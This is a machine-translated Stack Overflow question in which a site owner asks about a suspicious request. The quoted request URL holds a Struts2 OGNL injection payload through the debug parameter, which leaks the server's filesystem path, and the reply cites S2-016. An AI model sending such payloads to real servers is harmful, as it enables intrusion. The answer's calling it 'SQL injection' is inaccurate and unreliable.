java - 被攻击的 WordPress 网站

已关闭。此问题不符合Stack Overflow guidelines 。目前不接受答案。

已关闭 7 年前。

此问题似乎与 a specific programming problem, a software algorithm, or software tools primarily used by programmers 无关。如果您认为这个问题与 another Stack Exchange site 上的主题有关，您可以发表评论来解释问题可以在哪里得到解答。
此问题似乎与 a specific programming problem, a software algorithm, or software tools primarily used by programmers 无关。如果您认为这个问题与 another Stack Exchange site 上的主题有关，您可以发表评论来解释问题可以在哪里得到解答。

今天我登录并第一次看到它:

mysite.com/?debug=command&expression=%23res%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()

之后是另一个:

mysite.com/?redirect:

它会导致什么？注入(inject)数据库？病毒？

最佳答案

看起来有人试图利用 struts2 中的 SQL 注入(inject)漏洞来执行远程代码。

参见http://struts.apache.org/docs/s2-016.html

关于java - 被攻击的 WordPress 网站，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/33184893/

上一篇：java - 将项目添加到队列末尾

下一篇：java - 如何在继续当前线程之前等待事件发生？

java - 非标准 HTTP 端口源的 URLConnection FileNotFoundException

java - JAX-B : dynamically generate element name from XMLAttribute

php - wordpress安装错误is_read

php - Wordpress，setup_postdata() 没有完成其工作

css - 图片不会留在 div 边框内

java.lang.NoClassDefFoundError : org/springframework/orm/hibernate3/support/HibernateDaoSupport 错误

java - ClientRequestFactory RestEasy 已弃用...还有其他 RestEasy 替代方案吗？

java - 如何用java中的OOP设计一个RPG类系统？

wordpress - 如何防止Wordpress TinyMCE剥离没有链接文本的url